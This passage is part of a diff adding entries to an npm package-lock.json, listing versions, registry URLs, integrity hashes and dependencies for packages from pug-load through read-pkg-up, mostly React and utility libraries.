"sha512-gjD1yzp0yxbQqnzBAdlhbgoJL5qIFJw78juN1NpTLt/mfPJ5VgC4BvkoD3G23qKzJtIIXBbcCt6FioLSFLOHdw==", + "dependencies": { + "pug-error": "^2.0.0", + "pug-walk": "^2.0.0" + } + }, + "node_modules/pug-load": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/pug-load/-/pug-load-3.0.0.tgz", + "integrity": "sha512-OCjTEnhLWZBvS4zni/WUMjH2YSUosnsmjGBB1An7CsKQarYSWQ0GCVyd4eQPMFJqZ8w9xgs01QdiZXKVjk92EQ==", + "dependencies": { + "object-assign": "^4.1.1", + "pug-walk": "^2.0.0" + } + }, + "node_modules/pug-parser": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/pug-parser/-/pug-parser-6.0.0.tgz", + "integrity": "sha512-ukiYM/9cH6Cml+AOl5kETtM9NR3WulyVP2y4HOU45DyMim1IeP/OOiyEWRr6qk5I5klpsBnbuHpwKmTx6WURnw==", + "dependencies": { + "pug-error": "^2.0.0", + "token-stream": "1.0.0" + } + }, + "node_modules/pug-runtime": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/pug-runtime/-/pug-runtime-3.0.1.tgz", + "integrity": "sha512-L50zbvrQ35TkpHwv0G6aLSuueDRwc/97XdY8kL3tOT0FmhgG7UypU3VztfV/LATAvmUfYi4wNxSajhSAeNN+Kg==" + }, + "node_modules/pug-strip-comments": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/pug-strip-comments/-/pug-strip-comments-2.0.0.tgz", + "integrity": "sha512-zo8DsDpH7eTkPHCXFeAk1xZXJbyoTfdPlNR0bK7rpOMuhBYb0f5qUVCO1xlsitYd3w5FQTK7zpNVKb3rZoUrrQ==", + "dependencies": { + "pug-error": "^2.0.0" + } + }, + "node_modules/pug-walk": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/pug-walk/-/pug-walk-2.0.0.tgz", + "integrity": "sha512-yYELe9Q5q9IQhuvqsZNwA5hfPkMJ8u92bQLIMcsMxf/VADjNtEYptU+inlufAFYcWdHlwNfZOEnOOQrZrcyJCQ==" + }, + "node_modules/pump": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.0.tgz", + "integrity": "sha512-LwZy+p3SFs1Pytd/jYct4wpv49HiYCqd9Rlc5ZVdk0V+8Yzv6jR5Blk3TRmPL1ft69TxP0IMZGJ+WPFU2BFhww==", + "dependencies": { + "end-of-stream": "^1.1.0", + "once": "^1.3.1" + } + }, + "node_modules/pumpify": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/pumpify/-/pumpify-2.0.1.tgz", + "integrity": "sha512-m7KOje7jZxrmutanlkS1daj1dS6z6BgslzOXmcSEpIlCxM3VJH7lG5QLeck/6hgF6F4crFf01UtQmNsJfweTAw==", + "dependencies": { + "duplexify": "^4.1.1", + "inherits": "^2.0.3", + "pump": "^3.0.0" + } + }, + "node_modules/pumpify/node_modules/duplexify": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/duplexify/-/duplexify-4.1.2.tgz", + "integrity": "sha512-fz3OjcNCHmRP12MJoZMPglx8m4rrFP8rovnk4vT8Fs+aonZoCwGg10dSsQsfP/E62eZcPTMSMP6686fu9Qlqtw==", + "dependencies": { + "end-of-stream": "^1.4.1", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1", + "stream-shift": "^1.0.0" + } + }, + "node_modules/punycode": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", + "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==", + "engines": { + "node": ">=6" + } + }, + "node_modules/punycode.js": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/punycode.js/-/punycode.js-2.3.1.tgz", + "integrity": "sha512-uxFIHU0YlHYhDQtV4R9J6a52SLx28BCjT+4ieh7IGbgwVJWO+km431c4yRlREUAsAmt/uMjQUyQHNEPf0M39CA==", + "engines": { + "node": ">=6" + } + }, + "node_modules/qrcode": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/qrcode/-/qrcode-1.5.0.tgz", + "integrity": "sha512-9MgRpgVc+/+47dFvQeD6U2s0Z92EsKzcHogtum4QB+UNd025WOJSHvn/hjk9xmzj7Stj95CyUAs31mrjxliEsQ==", + "dev": true, + "dependencies": { + "dijkstrajs": "^1.0.1", + "encode-utf8": "^1.0.3", + "pngjs": "^5.0.0", + "yargs": "^15.3.1" + }, + "bin": { + "qrcode": "bin/qrcode" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/qrcode/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/qrcode/node_modules/camelcase": { + "version": "5.3.1", + "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", + "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", + "dev": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/qrcode/node_modules/cliui": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/cliui/-/cliui-6.0.0.tgz", + "integrity": "sha512-t6wbgtoCXvAzst7QgXxJYqPt0usEfbgQdftEPbLL/cvv6HPE5VgvqCuAIDR0NgU52ds6rFwqrgakNLrHEjCbrQ==", + "dev": true, + "dependencies": { + "string-width": "^4.2.0", + "strip-ansi": "^6.0.0", + "wrap-ansi": "^6.2.0" + } + }, + "node_modules/qrcode/node_modules/find-up": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", + "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", + "dev": true, + "dependencies": { + "locate-path": "^5.0.0", + "path-exists": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/qrcode/node_modules/locate-path": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", + "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", + "dev": true, + "dependencies": { + "p-locate": "^4.1.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/qrcode/node_modules/p-limit": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", + "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dev": true, + "dependencies": { + "p-try": "^2.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/qrcode/node_modules/p-locate": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", + "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", + "dev": true, + "dependencies": { + "p-limit": "^2.2.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/qrcode/node_modules/wrap-ansi": { + "version": "6.2.0", + "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-6.2.0.tgz", + "integrity": "sha512-r6lPcBGxZXlIcymEu7InxDMhdW0KDxpLgoFLcguasxCaJ/SOIZwINatK9KY/tf+ZrlywOKU0UDj3ATXUBfxJXA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.0.0", + "string-width": "^4.1.0", + "strip-ansi": "^6.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/qrcode/node_modules/y18n": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/y18n/-/y18n-4.0.3.tgz", + "integrity": "sha512-JKhqTOwSrqNA1NY5lSztJ1GrBiUodLMmIZuLiDaMRJ+itFd+ABVE8XBjOvIWL+rSqNDC74LCSFmlb/U4UZ4hJQ==", + "dev": true + }, + "node_modules/qrcode/node_modules/yargs": { + "version": "15.4.1", + "resolved": "https://registry.npmjs.org/yargs/-/yargs-15.4.1.tgz", + "integrity": "sha512-aePbxDmcYW++PaqBsJ+HYUFwCdv4LVvdnhBy78E57PIor8/OVvhMrADFFEDh8DHDFRv/O9i3lPhsENjO7QX0+A==", + "dev": true, + "dependencies": { + "cliui": "^6.0.0", + "decamelize": "^1.2.0", + "find-up": "^4.1.0", + "get-caller-file": "^2.0.1", + "require-directory": "^2.1.1", + "require-main-filename": "^2.0.0", + "set-blocking": "^2.0.0", + "string-width": "^4.2.0", + "which-module": "^2.0.0", + "y18n": "^4.0.0", + "yargs-parser": "^18.1.2" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/qrcode/node_modules/yargs-parser": { + "version": "18.1.3", + "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-18.1.3.tgz", + "integrity": "sha512-o50j0JeToy/4K6OZcaQmW6lyXXKhq7csREXcDwk2omFPJEwUNOVtJKvmDr9EI1fAJZUyZcRF7kxGBWmRXudrCQ==", + "dev": true, + "dependencies": { + "camelcase": "^5.0.0", + "decamelize": "^1.2.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/qs": { + "version": "6.13.0", + "resolved": "https://registry.npmjs.org/qs/-/qs-6.13.0.tgz", + "integrity": "sha512-+38qI9SOr8tfZ4QmJNplMUxqjbe7LKvvZgWdExBOmd+egZTtjLB67Gu0HRX3u/XOq7UU2Nx6nsjvS16Z9uwfpg==", + "dependencies": { + "side-channel": "^1.0.6" + }, + "engines": { + "node": ">=0.6" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/querystring": { + "version": "0.2.0", + "resolved": "https://registry.npmjs.org/querystring/-/querystring-0.2.0.tgz", + "integrity": "sha1-sgmEkgO7Jd+CDadW50cAWHhSFiA=", + "deprecated": "The querystring API is considered Legacy. new code should use the URLSearchParams API instead.", + "engines": { + "node": ">=0.4.x" + } + }, + "node_modules/querystring-es3": { + "version": "0.2.1", + "resolved": "https://registry.npmjs.org/querystring-es3/-/querystring-es3-0.2.1.tgz", + "integrity": "sha1-nsYfeQSYdXB9aUFFlv2Qek1xHnM=", + "dev": true, + "engines": { + "node": ">=0.4.x" + } + }, + "node_modules/querystringify": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/querystringify/-/querystringify-2.2.0.tgz", + "integrity": "sha512-FIqgj2EUvTa7R50u0rGsyTftzjYmv/a3hO345bZNrqabNqjtgiDMgmo4mkUjd+nzU5oF3dClKqFIPUKybUyqoQ==" + }, + "node_modules/queue-microtask": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/queue-microtask/-/queue-microtask-1.2.3.tgz", + "integrity": "sha512-NuaNSa6flKT5JaSYQzJok04JzTL1CA6aGhv5rfLW3PgqA+M2ChpZQnAC8h8i4ZFkBS8X5RqkDBHA7r4hej3K9A==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/quick-lru": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/quick-lru/-/quick-lru-1.1.0.tgz", + "integrity": "sha1-Q2CxfGETatOAeDl/8RQW4Ybc+7g=", + "engines": { + "node": ">=4" + } + }, + "node_modules/rambda": { + "version": "7.5.0", + "resolved": "https://registry.npmjs.org/rambda/-/rambda-7.5.0.tgz", + "integrity": "sha512-y/M9weqWAH4iopRd7EHDEQQvpFPHj1AA3oHozE9tfITHUtTR7Z9PSlIRRG2l1GuW7sefC1cXFfIcF+cgnShdBA==", + "dev": true + }, + "node_modules/random-bytes": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/random-bytes/-/random-bytes-1.0.0.tgz", + "integrity": "sha1-T2ih3Arli9P7lYSMMDJNt11kNgs=", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/randombytes": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/randombytes/-/randombytes-2.0.3.tgz", + "integrity": "sha1-Z0yZdgkBw8QRJ3GjHlIdw0nMCew=" + }, + "node_modules/randomstring": { + "version": "1.2.2", + "resolved": "https://registry.npmjs.org/randomstring/-/randomstring-1.2.2.tgz", + "integrity": "sha512-9FByiB8guWZLbE+akdQiWE3I1I6w7Vn5El4o4y7o5bWQ6DWPcEOp+aLG7Jezc8BVRKKpgJd2ppRX0jnKu1YCfg==", + "dependencies": { + "array-uniq": "1.0.2", + "randombytes": "2.0.3" + }, + "bin": { + "randomstring": "bin/randomstring" + }, + "engines": { + "node": "*" + } + }, + "node_modules/randomstring/node_modules/array-uniq": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/array-uniq/-/array-uniq-1.0.2.tgz", + "integrity": "sha1-X8w3OSB3VyPP1k1lxkvvU7+eum0=", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/range-parser": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/range-parser/-/range-parser-1.2.1.tgz", + "integrity": "sha512-Hrgsx+orqoygnmhFbKaHE6c296J+HTAQXoxEF6gNupROmmGJRoyzfG3ccAveqCBrwr/2yxQ5BVd/GTl5agOwSg==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/rate-limiter-flexible": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/rate-limiter-flexible/-/rate-limiter-flexible-2.4.1.tgz", + "integrity": "sha512-dgH4T44TzKVO9CLArNto62hJOwlWJMLUjVVr/ii0uUzZXEXthDNr7/yefW5z/1vvHAfycc1tnuiYyNJ8CTRB3g==" + }, + "node_modules/raw-body": { + "version": "2.5.2", + "resolved": "https://registry.npmjs.org/raw-body/-/raw-body-2.5.2.tgz", + "integrity": "sha512-8zGqypfENjCIqGhgXToC8aB2r7YrBX+AQAfIPs/Mlk+BtPTztOvTS01NRW/3Eh60J+a48lt8qsCzirQ6loCVfA==", + "dependencies": { + "bytes": "3.1.2", + "http-errors": "2.0.0", + "iconv-lite": "0.4.24", + "unpipe": "1.0.0" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/react": { + "version": "17.0.2", + "resolved": "https://registry.npmjs.org/react/-/react-17.0.2.tgz", + "integrity": "sha512-gnhPt75i/dq/z3/6q/0asP78D0u592D5L1pd7M8P+dck6Fu/jJeL6iVVK23fptSUZj8Vjf++7wXA8UNclGQcbA==", + "dependencies": { + "loose-envify": "^1.1.0", + "object-assign": "^4.1.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/react-async-script": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/react-async-script/-/react-async-script-1.2.0.tgz", + "integrity": "sha512-bCpkbm9JiAuMGhkqoAiC0lLkb40DJ0HOEJIku+9JDjxX3Rcs+ztEOG13wbrOskt3n2DTrjshhaQ/iay+SnGg5Q==", + "dev": true, + "dependencies": { + "hoist-non-react-statics": "^3.3.0", + "prop-types": "^15.5.0" + }, + "peerDependencies": { + "react": ">=16.4.1" + } + }, + "node_modules/react-chartjs-2": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/react-chartjs-2/-/react-chartjs-2-5.0.1.tgz", + "integrity": "sha512-u38C9OxynlNCBp+79grgXRs7DSJ9w8FuQ5/HO5FbYBbri8HSZW+9SWgjVshLkbXBfXnMGWakbHEtvN0nL2UG7Q==", + "dev": true, + "peerDependencies": { + "chart.js": "^4.0.0", + "react": "^16.8.0 || ^17.0.0 || ^18.0.0" + } + }, + "node_modules/react-color": { + "version": "2.19.3", + "resolved": "https://registry.npmjs.org/react-color/-/react-color-2.19.3.tgz", + "integrity": "sha512-LEeGE/ZzNLIsFWa1TMe8y5VYqr7bibneWmvJwm1pCn/eNmrabWDh659JSPn9BuaMpEfU83WTOJfnCcjDZwNQTA==", + "dev": true, + "dependencies": { + "@icons/material": "^0.2.4", + "lodash": "^4.17.15", + "lodash-es": "^4.17.15", + "material-colors": "^1.2.1", + "prop-types": "^15.5.10", + "reactcss": "^1.2.0", + "tinycolor2": "^1.4.1" + }, + "peerDependencies": { + "react": "*" + } + }, + "node_modules/react-deep-force-update": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/react-deep-force-update/-/react-deep-force-update-1.1.2.tgz", + "integrity": "sha512-WUSQJ4P/wWcusaH+zZmbECOk7H5N2pOIl0vzheeornkIMhu+qrNdGFm0bDZLCb0hSF0jf/kH1SgkNGfBdTc4wA==", + "dev": true + }, + "node_modules/react-dnd": { + "version": "16.0.1", + "resolved": "https://registry.npmjs.org/react-dnd/-/react-dnd-16.0.1.tgz", + "integrity": "sha512-QeoM/i73HHu2XF9aKksIUuamHPDvRglEwdHL4jsp784BgUuWcg6mzfxT0QDdQz8Wj0qyRKx2eMg8iZtWvU4E2Q==", + "dev": true, + "dependencies": { + "@react-dnd/invariant": "^4.0.1", + "@react-dnd/shallowequal": "^4.0.1", + "dnd-core": "^16.0.1", + "fast-deep-equal": "^3.1.3", + "hoist-non-react-statics": "^3.3.2" + }, + "peerDependencies": { + "@types/hoist-non-react-statics": ">= 3.3.1", + "@types/node": ">= 12", + "@types/react": ">= 16", + "react": ">= 16.14" + }, + "peerDependenciesMeta": { + "@types/hoist-non-react-statics": { + "optional": true + }, + "@types/node": { + "optional": true + }, + "@types/react": { + "optional": true + } + } + }, + "node_modules/react-dnd-html5-backend": { + "version": "16.0.1", + "resolved": "https://registry.npmjs.org/react-dnd-html5-backend/-/react-dnd-html5-backend-16.0.1.tgz", + "integrity": "sha512-Wu3dw5aDJmOGw8WjH1I1/yTH+vlXEL4vmjk5p+MHxP8HuHJS1lAGeIdG/hze1AvNeXWo/JgULV87LyQOr+r5jw==", + "dev": true, + "dependencies": { + "dnd-core": "^16.0.1" + } + }, + "node_modules/react-docgen": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/react-docgen/-/react-docgen-7.1.1.tgz", + "integrity": "sha512-hlSJDQ2synMPKFZOsKo9Hi8WWZTC7POR8EmWvTSjow+VDgKzkmjQvFm2fk0tmRw+f0vTOIYKlarR0iL4996pdg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/core": "^7.18.9", + "@babel/traverse": "^7.18.9", + "@babel/types": "^7.18.9", + "@types/babel__core": "^7.18.0", + "@types/babel__traverse": "^7.18.0", + "@types/doctrine": "^0.0.9", + "@types/resolve": "^1.20.2", + "doctrine": "^3.0.0", + "resolve": "^1.22.1", + "strip-indent": "^4.0.0" + }, + "engines": { + "node": ">=16.14.0" + } + }, + "node_modules/react-docgen-typescript": { + "version": "2.2.2", + "resolved": "https://registry.npmjs.org/react-docgen-typescript/-/react-docgen-typescript-2.2.2.tgz", + "integrity": "sha512-tvg2ZtOpOi6QDwsb3GZhOjDkkX0h8Z2gipvTg6OVMUyoYoURhEiRNePT8NZItTVCDh39JJHnLdfCOkzoLbFnTg==", + "dev": true, + "license": "MIT", + "peerDependencies": { + "typescript": ">= 4.3.x" + } + }, + "node_modules/react-dom": { + "version": "17.0.2", + "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-17.0.2.tgz", + "integrity": "sha512-s4h96KtLDUQlsENhMn1ar8t2bEa+q/YAtj8pPPdIjPDGBDIVNsrD9aXNWqspUe6AzKCIG0C1HZZLqLV7qpOBGA==", + "dependencies": { + "loose-envify": "^1.1.0", + "object-assign": "^4.1.1", + "scheduler": "^0.20.2" + }, + "peerDependencies": { + "react": "17.0.2" + } + }, + "node_modules/react-error-boundary": { + "version": "2.3.2", + "resolved": "https://registry.npmjs.org/react-error-boundary/-/react-error-boundary-2.3.2.tgz", + "integrity": "sha512-ZMzi7s4pj/6A/6i9RS4tG7g1PdF2Rgr4/7FTQ8sbKHex19uNji0j+xq0OS//c6TUgQRKoL6P51BNNNFmYpRMhw==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.11.2" + }, + "engines": { + "node": ">=10", + "npm": ">=6" + }, + "peerDependencies": { + "react": ">=16.13.1" + } + }, + "node_modules/react-fast-compare": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/react-fast-compare/-/react-fast-compare-2.0.4.tgz", + "integrity": "sha512-suNP+J1VU1MWFKcyt7RtjiSWUjvidmQSlqu+eHslq+342xCbGTYmC0mEhPCOHxlW0CywylOC1u2DFAT+bv4dBw==", + "dev": true + }, + "node_modules/react-google-recaptcha": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/react-google-recaptcha/-/react-google-recaptcha-3.1.0.tgz", + "integrity": "sha512-cYW2/DWas8nEKZGD7SCu9BSuVz8iOcOLHChHyi7upUuVhkpkhYG/6N3KDiTQ3XAiZ2UAZkfvYKMfAHOzBOcGEg==", + "dev": true, + "dependencies": { + "prop-types": "^15.5.0", + "react-async-script": "^1.2.0" + }, + "peerDependencies": { + "react": ">=16.4.1" + } + }, + "node_modules/react-i18next": { + "version": "13.3.1", + "resolved": "https://registry.npmjs.org/react-i18next/-/react-i18next-13.3.1.tgz", + "integrity": "sha512-JAtYREK879JXaN9GdzfBI4yJeo/XyLeXWUsRABvYXiFUakhZJ40l+kaTo+i+A/3cKIED41kS/HAbZ5BzFtq/Og==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.22.5", + "html-parse-stringify": "^3.0.1" + }, + "peerDependencies": { + "i18next": ">= 23.2.3", + "react": ">= 16.8.0" + }, + "peerDependenciesMeta": { + "react-dom": { + "optional": true + }, + "react-native": { + "optional": true + } + } + }, + "node_modules/react-is": { + "version": "17.0.2", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-17.0.2.tgz", + "integrity": "sha512-w2GsyukL62IJnlaff/nRegPQR94C/XXamvMWmSHRJ4y7Ts/4ocGRmTHvOs8PSE6pB3dWOrD/nueuU5sduBsQ4w==" + }, + "node_modules/react-lifecycles-compat": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/react-lifecycles-compat/-/react-lifecycles-compat-3.0.4.tgz", + "integrity": "sha512-fBASbA6LnOU9dOU2eW7aQ8xmYBSXUIWr+UmF9b1efZBazGNO+rcXT/icdKnYm2pTwcRylVUYwW7H1PHfLekVzA==", + "dev": true + }, + "node_modules/react-linkify": { + "version": "1.0.0-alpha", + "resolved": "https://registry.npmjs.org/react-linkify/-/react-linkify-1.0.0-alpha.tgz", + "integrity": "sha512-7gcIUvJkAXXttt1fmBK9cwn+1jTa4hbKLGCZ9J1U6EOkyb2/+LKL1Z28d9rtDLMnpvImlNlLPdTPooorl5cpmg==", + "dev": true, + "dependencies": { + "linkify-it": "^2.0.3", + "tlds": "^1.199.0" + } + }, + "node_modules/react-linkify/node_modules/linkify-it": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/linkify-it/-/linkify-it-2.2.0.tgz", + "integrity": "sha512-GnAl/knGn+i1U/wjBz3akz2stz+HrHLsxMwHQGofCDfPvlf+gDKN58UtfmUquTY4/MXeE2x7k19KQmeoZi94Iw==", + "dev": true, + "dependencies": { + "uc.micro": "^1.0.1" + } + }, + "node_modules/react-proxy": { + "version": "1.1.8", + "resolved": "https://registry.npmjs.org/react-proxy/-/react-proxy-1.1.8.tgz", + "integrity": "sha512-46GkBpZD97R/vV+iw+u6aFACzIHOst9gCl41d5K5vepPBz2i2gqHmXQJWKXsrUsSOdylKahN3sd9taswFN8Wzw==", + "dev": true, + "dependencies": { + "lodash": "^4.6.1", + "react-deep-force-update": "^1.0.0" + } + }, + "node_modules/react-redux": { + "version": "7.2.9", + "resolved": "https://registry.npmjs.org/react-redux/-/react-redux-7.2.9.tgz", + "integrity": "sha512-Gx4L3uM182jEEayZfRbI/G11ZpYdNAnBs70lFVMNdHJI76XYtR+7m0MN+eAs7UHBPhWXcnFPaS+9owSCJQHNpQ==", + "dependencies": { + "@babel/runtime": "^7.15.4", + "@types/react-redux": "^7.1.20", + "hoist-non-react-statics": "^3.3.2", + "loose-envify": "^1.4.0", + "prop-types": "^15.7.2", + "react-is": "^17.0.2" + }, + "peerDependencies": { + "react": "^16.8.3 || ^17 || ^18" + }, + "peerDependenciesMeta": { + "react-dom": { + "optional": true + }, + "react-native": { + "optional": true + } + } + }, + "node_modules/react-refresh": { + "version": "0.14.0", + "resolved": "https://registry.npmjs.org/react-refresh/-/react-refresh-0.14.0.tgz", + "integrity": "sha512-wViHqhAd8OHeLS/IRMJjTSDHF3U9eWi62F/MledQGPdJGDhodXJ9PBLNGr6WWL7qlH12Mt3TyTpbS+hGXMjCzQ==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/react-resizable-panels": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/react-resizable-panels/-/react-resizable-panels-2.1.1.tgz", + "integrity": "sha512-+cUV/yZBYfiBj+WJtpWDJ3NtR4zgDZfHt3+xtaETKE+FCvp+RK/NJxacDQKxMHgRUTSkfA6AnGljQ5QZNsCQoA==", + "dev": true, + "peerDependencies": { + "react": "^16.14.0 || ^17.0.0 || ^18.0.0", + "react-dom": "^16.14.0 || ^17.0.0 || ^18.0.0" + } + }, + "node_modules/react-responsive": { + "version": "10.0.0", + "resolved": "https://registry.npmjs.org/react-responsive/-/react-responsive-10.0.0.tgz", + "integrity": "sha512-N6/UiRLGQyGUqrarhBZmrSmHi2FXSD++N5VbSKsBBvWfG0ZV7asvUBluSv5lSzdMyEVjzZ6Y8DL4OHABiztDOg==", + "dependencies": { + "hyphenate-style-name": "^1.0.0", + "matchmediaquery": "^0.4.2", + "prop-types": "^15.6.1", + "shallow-equal": "^3.1.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "react": ">=16.8.0" + } + }, + "node_modules/react-router": { + "version": "6.26.1", + "resolved": "https://registry.npmjs.org/react-router/-/react-router-6.26.1.tgz", + "integrity": "sha512-kIwJveZNwp7teQRI5QmwWo39A5bXRyqpH0COKKmPnyD2vBvDwgFXSqDUYtt1h+FEyfnE8eXr7oe0MxRzVwCcvQ==", + "dependencies": { + "@remix-run/router": "1.19.1" + }, + "engines": { + "node": ">=14.0.0" + }, + "peerDependencies": { + "react": ">=16.8" + } + }, + "node_modules/react-router-dom": { + "version": "6.26.1", + "resolved": "https://registry.npmjs.org/react-router-dom/-/react-router-dom-6.26.1.tgz", + "integrity": "sha512-veut7m41S1fLql4pLhxeSW3jlqs+4MtjRLj0xvuCEXsxusJCbs6I8yn9BxzzDX2XDgafrccY6hwjmd/bL54tFw==", + "dependencies": { + "@remix-run/router": "1.19.1", + "react-router": "6.26.1" + }, + "engines": { + "node": ">=14.0.0" + }, + "peerDependencies": { + "react": ">=16.8", + "react-dom": ">=16.8" + } + }, + "node_modules/react-transform-hmr": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/react-transform-hmr/-/react-transform-hmr-1.0.4.tgz", + "integrity": "sha512-8bK1DWUZynE6swD2jNPbzO5mvhB8fs9Ub5GksoVqYkc9i06FdSLC36qQYjaKOW79KBdsROq2cK0tRKITiEzmyg==", + "dev": true, + "dependencies": { + "global": "^4.3.0", + "react-proxy": "^1.1.7" + } + }, + "node_modules/reactcss": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/reactcss/-/reactcss-1.2.3.tgz", + "integrity": "sha512-KiwVUcFu1RErkI97ywr8nvx8dNOpT03rbnma0SSalTYjkrPYaEajR4a/MRt6DZ46K6arDRbWMNHF+xH7G7n/8A==", + "dev": true, + "dependencies": { + "lodash": "^4.0.1" + } + }, + "node_modules/read": { + "version": "1.0.7", + "resolved": "https://registry.npmjs.org/read/-/read-1.0.7.tgz", + "integrity": "sha1-s9oZvQUkMal2cdRKQmNK33ELQMQ=", + "dependencies": { + "mute-stream": "~0.0.4" + }, + "engines": { + "node": ">=0.8" + } + }, + "node_modules/read-cache": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/read-cache/-/read-cache-1.0.0.tgz", + "integrity": "sha512-Owdv/Ft7IjOgm/i0xvNDZ1LrRANRfew4b2prF3OWMQLxLfu3bS8FVhCsrSCMK4lR56Y9ya+AThoTpDCTxCmpRA==", + "dev": true, + "dependencies": { + "pify": "^2.3.0" + } + }, + "node_modules/read-pkg": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/read-pkg/-/read-pkg-5.2.0.tgz", + "integrity": "sha512-Ug69mNOpfvKDAc2Q8DRpMjjzdtrnv9HcSMX+4VsZxD1aZ6ZzrIE7rlzXBtWTyhULSMKg076AW6WR5iZpD0JiOg==", + "dev": true, + "dependencies": { + "@types/normalize-package-data": "^2.4.0", + "normalize-package-data": "^2.5.0", + "parse-json": "^5.0.0", + "type-fest": "^0.6.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/read-pkg-up": { + "version": "7.0.1", + "resolved": "https://registry.npmjs.org/read-pkg-up/-/read-pkg-up-7.0.1.tgz", + "integrity": 